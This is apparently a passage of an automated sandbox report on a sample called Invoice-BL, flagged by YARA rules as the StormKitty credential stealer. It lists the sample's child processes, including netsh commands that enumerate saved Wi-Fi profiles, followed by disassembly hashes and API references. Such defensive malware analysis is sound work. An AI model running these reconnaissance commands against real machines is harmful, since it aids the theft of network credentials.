Yara detected StormKitty Stealer, Source: 0000000B.00000002.4117251220.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4117251220.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000B.00000002.4117251220.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	08:29:12
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:29:12
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:29:12
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x640000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:29:12
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profile
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:29:12
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0x30000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	08:29:13
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:29:13
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	08:29:13
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x640000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	08:29:13
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	08:29:23
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8160, Parent PID: 8152

General

Target ID:	25
Start time:	08:29:23
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	08:29:23
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x640000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	08:29:23
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show profile
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	08:29:23
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr All
Imagebase:	0x30000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	08:29:23
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4008, Parent PID: 792

General

Target ID:	30
Start time:	08:29:23
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	08:29:23
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\chcp.com
Wow64 process (32bit):	true
Commandline:	chcp 65001
Imagebase:	0x640000
File size:	12'800 bytes
MD5 hash:	20A59FB950D8A191F7D35C4CA7DA9CAF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	08:29:23
Start date:	31/12/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	40
Total number of Limit Nodes:	6

Executed Functions

Function 077D633A Relevance: 4.2, Strings: 3, Instructions: 409
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ry, xrefs: 077D672B
ry, xrefs: 077D6724
ry, xrefs: 077D6742

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: ry$ry$ry
API String ID: 0-128149707
Opcode ID: c6e16c8779e6afb0fe98153c4c40df70e6ba67dc0160fe62dada14b9da9bb389
Instruction ID: 99584ed2ce3a9e0c084d1373e1a5b23a43e224e23fa1bf935f53f64370d0eca5
Opcode Fuzzy Hash: c6e16c8779e6afb0fe98153c4c40df70e6ba67dc0160fe62dada14b9da9bb389
Instruction Fuzzy Hash: 8EF1AEB590560ADFCB04CFA4D4994EEFBB2FF89390B15C46AD415EB215D334AA82CF90

Function 077D6371 Relevance: 4.1, Strings: 3, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ry, xrefs: 077D672B
ry, xrefs: 077D6724
ry, xrefs: 077D6742

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: ry$ry$ry
API String ID: 0-128149707
Opcode ID: 2104ca6ff1d755f4467e6071137ed751af271359cebaa88494c0d6b8076dc17e
Instruction ID: 278967bfcb517791d76d02d6dd0a2ed6c3c73e58cf043b1c8c606dbacb269abb
Opcode Fuzzy Hash: 2104ca6ff1d755f4467e6071137ed751af271359cebaa88494c0d6b8076dc17e
Instruction Fuzzy Hash: C5F1A9F590560ADFCB04CFA4D4994AEBBB2FF893D0B15C46AD415EB215D334AA82CF90

Function 077D6391 Relevance: 4.1, Strings: 3, Instructions: 381
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ry, xrefs: 077D672B
ry, xrefs: 077D6724
ry, xrefs: 077D6742

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: ry$ry$ry
API String ID: 0-128149707
Opcode ID: 69f75d9c75d0378d411e37237c81e45d957b3dd24c8c9f1c3336387c3b6f064b
Instruction ID: 6ff64bcd15c96c133b705921a0c1802391fb416a9dc83189f217d55fd7cbc17c
Opcode Fuzzy Hash: 69f75d9c75d0378d411e37237c81e45d957b3dd24c8c9f1c3336387c3b6f064b
Instruction Fuzzy Hash: DFE19BB190560ADFCB04CFA5D4994AEBBB2FF893D0B15C46AD405EB215D334AA82CF90

Function 077D4250 Relevance: 4.0, Strings: 3, Instructions: 299
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teqq, xrefs: 077D4359
z^I, xrefs: 077D44B1
Teqq, xrefs: 077D4560

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: Teqq$Teqq$z^I
API String ID: 0-1790237990
Opcode ID: 0961df68a5c05ec046f87a6198708283b191745785381c61d7b20b988b93d5ec
Instruction ID: 35c781f656c7de67e1d523aff7b30948822c59731c7c3ce452b6d5e93c279749
Opcode Fuzzy Hash: 0961df68a5c05ec046f87a6198708283b191745785381c61d7b20b988b93d5ec
Instruction Fuzzy Hash: F0C16BB5E146998FCF04CFA9C8445EDBFF2BF8A390F14842AD855AB254D730A942CF94

Function 077D6458 Relevance: 4.0, Strings: 3, Instructions: 284
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ry, xrefs: 077D672B
ry, xrefs: 077D6724
ry, xrefs: 077D6742

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: ry$ry$ry
API String ID: 0-128149707
Opcode ID: d3aafc4a7152c52d33a4cd71824dfaa263541edb4cecb64bedb9b3832066ad39
Instruction ID: 447ec6bad13cd1e796f6aeacdb762a1ea1b1bd1e3d2ae1f11a5a54e9f9d56621
Opcode Fuzzy Hash: d3aafc4a7152c52d33a4cd71824dfaa263541edb4cecb64bedb9b3832066ad39
Instruction Fuzzy Hash: FCC137B0E1520ADFCB04CFA5C4958AEFBB2FF89380B11C559D515AB314D738AA82CF94

Function 077D42DF Relevance: 4.0, Strings: 3, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teqq, xrefs: 077D4359
z^I, xrefs: 077D44B1
Teqq, xrefs: 077D4560

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: Teqq$Teqq$z^I
API String ID: 0-1790237990
Opcode ID: 5b6cef7840b9e15ff668ca030f4a7bd4a39594209adfb227a722110d066cd904
Instruction ID: 85745bb1a9601e2ef2cab598de273cda9291a0b30ced23b78aff27de3b28f9a2
Opcode Fuzzy Hash: 5b6cef7840b9e15ff668ca030f4a7bd4a39594209adfb227a722110d066cd904
Instruction Fuzzy Hash: 6F91F2B4E102598FCB08CFEAC9845DEFBB2BF89340F24942AD855BB268D7749901CF54

Function 077D42F0 Relevance: 4.0, Strings: 3, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Teqq, xrefs: 077D4359
z^I, xrefs: 077D44B1
Teqq, xrefs: 077D4560

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: Teqq$Teqq$z^I
API String ID: 0-1790237990
Opcode ID: 8b66221fd887f64d1245ef02c7207c724e5ac6e88c696df2b87b482606bf0ea2
Instruction ID: 240bcd61317a2361ac20a8f47f2fc764ba870777c86f88dce6dd42cb37112d1a
Opcode Fuzzy Hash: 8b66221fd887f64d1245ef02c7207c724e5ac6e88c696df2b87b482606bf0ea2
Instruction Fuzzy Hash: 1091D3B4E102598FCB08CFEAC5845AEFBB2FF89340F24942AD855BB268D7749905CF54

Function 077DD280 Relevance: 2.7, Strings: 2, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UC;", xrefs: 077DD46E
TuA, xrefs: 077DD3F0

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: TuA$UC;"
API String ID: 0-2071649361
Opcode ID: f1190dec60ca81f166abbd8078abf7fa1d93e388e19d16b47fe25ae13afa0bbd
Instruction ID: bcdcf9e9a5bae7492ed7343800d9a8ee71d2b1cb923a2d439fdc4722c56f66a3
Opcode Fuzzy Hash: f1190dec60ca81f166abbd8078abf7fa1d93e388e19d16b47fe25ae13afa0bbd
Instruction Fuzzy Hash: D29109B1E24209DFCB18CFE6E58559EFBB2FF89350F10942AE415A7264E730A942CF14

Function 077DD270 Relevance: 2.7, Strings: 2, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UC;", xrefs: 077DD46E
TuA, xrefs: 077DD3F0

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: TuA$UC;"
API String ID: 0-2071649361
Opcode ID: 0a551163c77d06f9525d16ec3fc6bc3365b06496cb4abcf6a44fdac8c740b401
Instruction ID: 57e14ebd0372b374190fef43669807646df8f0ecff5811f001df91b35855e00c
Opcode Fuzzy Hash: 0a551163c77d06f9525d16ec3fc6bc3365b06496cb4abcf6a44fdac8c740b401
Instruction Fuzzy Hash: BA9127B1E24209EFCB18CFE5E58459EFBB2EF89350F10942AE415A7264E734A942CF04

Function 077DBC48 Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

5=6, xrefs: 077DBD86

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: 5=6
API String ID: 0-2897083178
Opcode ID: 8b26d33d6c832e1ab8e684278bbc16b033c9fe856b45dcebf559eb4cfbc230fa
Instruction ID: 0e5b7c762377a948c96fe75f8f53838ad60695c7275f21dab9434bfdf9900a00
Opcode Fuzzy Hash: 8b26d33d6c832e1ab8e684278bbc16b033c9fe856b45dcebf559eb4cfbc230fa
Instruction Fuzzy Hash: 64717AB5E2520A9FCB04CFA5D9454AEFBF2FF89241F10D92AD019E7264DB349A01CF54

Function 077DBC58 Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

5=6, xrefs: 077DBD86

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: 5=6
API String ID: 0-2897083178
Opcode ID: 46abc62eca936ed47f43b1e7b5a278bb99ab0942072f82db9bb56c66dabd1d16
Instruction ID: d70e8a08461eedfb2b8dc3bcdb9a8a7373be5191a872c30af04e75404b26a656
Opcode Fuzzy Hash: 46abc62eca936ed47f43b1e7b5a278bb99ab0942072f82db9bb56c66dabd1d16
Instruction Fuzzy Hash: 08617BB5E2560A9FCB04CFA5D9454AEFBF2FF89240F10D92AD01AE7264DB349A00CF50

Function 077D4BA0 Relevance: 1.4, Strings: 1, Instructions: 141COMMON

Download Yara Rule

Strings

-2m, xrefs: 077D4CC3

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: -2m
API String ID: 0-2686427999
Opcode ID: 0dec5fd3f9a8f3b6fb9dfba2027ec9e306095a17b00265e8b665c8d0014ae0e3
Instruction ID: e422726df09f5ca347927f186119ef12dedc0d0e37c0a5d0e795a5405b6e39d4
Opcode Fuzzy Hash: 0dec5fd3f9a8f3b6fb9dfba2027ec9e306095a17b00265e8b665c8d0014ae0e3
Instruction Fuzzy Hash: AB513AB0E042499FCB08CFAAD5846AEFFF2FF89340F28D069D819B7255D73459418B94

Function 077DDB80 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4059d948f46eb90687f5865b8c76313378f9a396835e4cdfb8c4d36af73325d1
Instruction ID: 5c1ed2896ed3d90fa555bc84c624aed8741765245e251c3d10cf79459f651e2e
Opcode Fuzzy Hash: 4059d948f46eb90687f5865b8c76313378f9a396835e4cdfb8c4d36af73325d1
Instruction Fuzzy Hash: 42B1DAB1E15209DFDB28CFA6D5405AEFBB2BF89340F20D42AE419B7254E7749A06CF50

Function 077DDB7E Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0363372b5a42fbc6d92b07aba8099d59024c09e5a5476ec0ba7e9d34ebfdb0e
Instruction ID: e427fbb725c3387b76610dec1f6f88fb81d466f1e3525a4f770fe746c1984004
Opcode Fuzzy Hash: e0363372b5a42fbc6d92b07aba8099d59024c09e5a5476ec0ba7e9d34ebfdb0e
Instruction Fuzzy Hash: 54A1EAB1E15209DFDB28CFA6D5405AEFBB2BF89340F20D42AE419B7254E7749A06CF50

Function 077D55DA Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 236a900f0167e6273eafe00d53b7a7c609c49fa132f2e376ec9fa41c5427b0ce
Instruction ID: 0c829aa6dc2e73704e61f44e18e75670222e93b69f19acabc15f6f22bf02e072
Opcode Fuzzy Hash: 236a900f0167e6273eafe00d53b7a7c609c49fa132f2e376ec9fa41c5427b0ce
Instruction Fuzzy Hash: E73148B1E012188FDB18CFAAD8406DEBBB7EFC9350F14C06AD409A7264DB355A56CF90

Function 013DD1C8 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 013DD256
GetCurrentThread.KERNEL32 ref: 013DD293
GetCurrentProcess.KERNEL32 ref: 013DD2D0
GetCurrentThreadId.KERNEL32 ref: 013DD329

Memory Dump Source

Source File: 00000000.00000002.1722104121.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13d0000_Invoice-BL.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f7767c1cccc841e768d2fe1e84f0a22c54de97145096de1c4fd8150f15f5293c
Instruction ID: e0a7c464eebf3555a33565214c703acba60fbb8f707373c2a08f37ad0148f750
Opcode Fuzzy Hash: f7767c1cccc841e768d2fe1e84f0a22c54de97145096de1c4fd8150f15f5293c
Instruction Fuzzy Hash: 7E5146B09017498FDB14DFA9D548BDEBFF1AF88314F208559D409A73A0DB349948CF65

Function 013DD1D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 013DD256
GetCurrentThread.KERNEL32 ref: 013DD293
GetCurrentProcess.KERNEL32 ref: 013DD2D0
GetCurrentThreadId.KERNEL32 ref: 013DD329

Memory Dump Source

Source File: 00000000.00000002.1722104121.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13d0000_Invoice-BL.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6921a49ae873c1a3739671d91ec824c65a032a8e91454a27c91dd86646753211
Instruction ID: 2fd91f39350a08133f3a4be451f90994dca5151c42b5c1b65e674fc824c0a4e6
Opcode Fuzzy Hash: 6921a49ae873c1a3739671d91ec824c65a032a8e91454a27c91dd86646753211
Instruction Fuzzy Hash: 1A5137B09017098FDB18DFAAD548BDEBBF1EF88315F208459E009A7390DB759988CF65

Function 013DB223 Relevance: 1.7, APIs: 1, Instructions: 199COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 013DB47E

Memory Dump Source

Source File: 00000000.00000002.1722104121.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13d0000_Invoice-BL.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ee4150e96aa2210c029cb933223046989109c9b20a5c8ebd4eb2ecc6a5b2c1c9
Instruction ID: 760c9aa6e23ec18c07ee6604595eb798bff934b157309b30a02a412feb5b9490
Opcode Fuzzy Hash: ee4150e96aa2210c029cb933223046989109c9b20a5c8ebd4eb2ecc6a5b2c1c9
Instruction Fuzzy Hash: 70812671A00B458FDB24DF2AE44479ABBF1FF89308F008A2DD58AD7A54DB75E845CB90

Function 013D449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 013D59A9

Memory Dump Source

Source File: 00000000.00000002.1722104121.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13d0000_Invoice-BL.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f8e449a6d10c4d0953a0da871a6e4cae020fe02f4daff1cf6ee251946ada7908
Instruction ID: 43b054283c419bbb7935fcd427a687c79bea3ef9f3b9c9e415a4cf798f725c2d
Opcode Fuzzy Hash: f8e449a6d10c4d0953a0da871a6e4cae020fe02f4daff1cf6ee251946ada7908
Instruction Fuzzy Hash: 5241DFB1C0071DCBDB24DFAAD884B9EBBB5FF49304F20806AD409AB251DB716949CF91

Function 013D58ED Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 013D59A9

Memory Dump Source

Source File: 00000000.00000002.1722104121.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13d0000_Invoice-BL.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9636bb61b19d3ec9c8068031e2c2a304b8326cdafff038c04100405c71a0fd08
Instruction ID: 3809acb5af40016c611bcdfa299f43ecf03969e3c8880c79f567aa01197190fd
Opcode Fuzzy Hash: 9636bb61b19d3ec9c8068031e2c2a304b8326cdafff038c04100405c71a0fd08
Instruction Fuzzy Hash: 9C41E2B1C00719CFEB25DFAAD884BDDBBB5BF49304F20805AD409AB251DB71694ACF91

Function 077DB468 Relevance: 1.6, APIs: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 077DB4E3

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 59c417a43f8887b8425fc5f3d692f5c35a3a75bd50a56f14e5f8c4fba6a1733d
Instruction ID: 1f1a1be4c1a2ff9ed3c1e57ed12b347ba57505c1dc320e1577f6ef4b22a42fb1
Opcode Fuzzy Hash: 59c417a43f8887b8425fc5f3d692f5c35a3a75bd50a56f14e5f8c4fba6a1733d
Instruction Fuzzy Hash: BB2108B59002499FCB10DF9AC485BDEFBF4EB48320F10852AE858A7251D774A945CFA1

Function 013DB4B0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 013DB47E

Memory Dump Source

Source File: 00000000.00000002.1722104121.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13d0000_Invoice-BL.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 212a4d15e2189991b3ceacadc66542838e4e5b74ec2ec81aaeffc1bd51caec9d
Instruction ID: 114ab3ae5acdab395b974849e15883e76ead2263313d4d5489f25345f13264ce
Opcode Fuzzy Hash: 212a4d15e2189991b3ceacadc66542838e4e5b74ec2ec81aaeffc1bd51caec9d
Instruction Fuzzy Hash: 0F113A72A042059FDB10DF2FE8047EAFFF59FC6328F058169D108D3295C6358805CB60

Function 013DD828 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013DD8AF

Memory Dump Source

Source File: 00000000.00000002.1722104121.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13d0000_Invoice-BL.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
